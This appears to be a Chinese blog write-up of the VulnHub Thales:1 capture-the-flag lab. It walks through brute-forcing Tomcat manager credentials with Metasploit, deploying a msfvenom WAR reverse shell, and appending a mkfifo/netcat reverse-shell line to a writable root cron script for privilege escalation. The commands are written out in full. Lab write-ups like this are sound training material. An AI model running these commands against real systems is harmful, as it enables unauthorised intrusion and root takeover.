vulhub thales:1 靶场

靶机环境下载地址:https://www.vulnhub.com/entry/thales-1,749/

信息收集

对靶机目标进行端口扫描
vulhub thales:1 靶场_第1张图片
发现开放了22与8080端口,且8080端口为tomcat代理
使用浏览器进行访问
vulhub thales:1 靶场_第2张图片
发现需要进行登录
而且页面好像也没有其他有用的信息
先扫一下后台吧
但是好像依然没有什么有用的信息
(图片走神了~)
于是我只能尝试一下对用户名和密码进行爆破
使用msf
在这里插入图片描述
vulhub thales:1 靶场_第3张图片
居然成功了

Login Successful: tomcat:role1

漏洞利用

于是反手就去登录
登录进入后
vulhub thales:1 靶场_第4张图片
发现这里可以上传文件
这不就是一个可以利用的地方吗
发现需要上传war文件,于是去到https://www.revshells.com/
去生成一个war的反弹shell 的文件
vulhub thales:1 靶场_第5张图片

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.1.7 LPORT=9001 -f war -o shell.war

这里关于msfvenom就不展开细聊了,有兴趣可以去自行了解或http://t.csdn.cn/0aRRA 去学习
直接上传并在kali进行端口监听

nc -lvvp 9001 

vulhub thales:1 靶场_第6张图片
部署成功后,通过网站访问后,成功接收到反弹的shell
vulhub thales:1 靶场_第7张图片
进入交互式shell

python3 -c "import pty;pty.spawn('/bin/bash')"

这个对于提权来说是很重要的一步
进入之后居然是在根目录下,我们先到/home路径下
在这里插入图片描述
发现两个文件
第一个notes.txt文件
在这里插入图片描述

I prepared a backup script for you. The script is in this directory "/usr/local/bin/backup.sh". Good Luck.

说在这个目录下准备了一个backup.sh的文件
再查看另外一个user.txt文件,被拒绝
由于我比较莽,就没有再继续看这个文件,转而就去了/usr/local/bin/backup.sh目录下
vulhub thales:1 靶场_第8张图片
查看文件内容,发现这些执行的内容。。。好像不太知道有什么用

提权

在这里插入图片描述
但是查看一下权限,root用户权限,我们可以执行和写入
如果通过root用户进行执行,我们再写入反弹shell不就可以提权了
于是先去写入反弹shell

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.7 1234 >/tmp/f" >> backup.sh
并在kali端进行监听
nc -lvvp 1234

BUT 问题来了,不清楚这个文件是否会自动执行。
通过crontab 查看,thales用户没有计划任务,root用户无权限查看
幸运的是,过了一会,反弹成功
vulhub thales:1 靶场_第9张图片
激动的查看,root权限
直接转到root目录下,查看flag
vulhub thales:1 靶场_第10张图片
然后查看

crontab -u root -l

确实有计划任务,这次算是一点运气吧
但是-----------------
在去网上查看其他大佬的博客后,虽然没查到是否还有方法能够确定backup.sh文件可以定时执行,但发现了
这个靶场还有另一个flag
就是被我遗忘的/home/thales/目录下的user.txt文件
vulhub thales:1 靶场_第11张图片
果然,还是太莽了!
其中若还有遗漏,还望有大佬指点!

你可能感兴趣的:(web安全)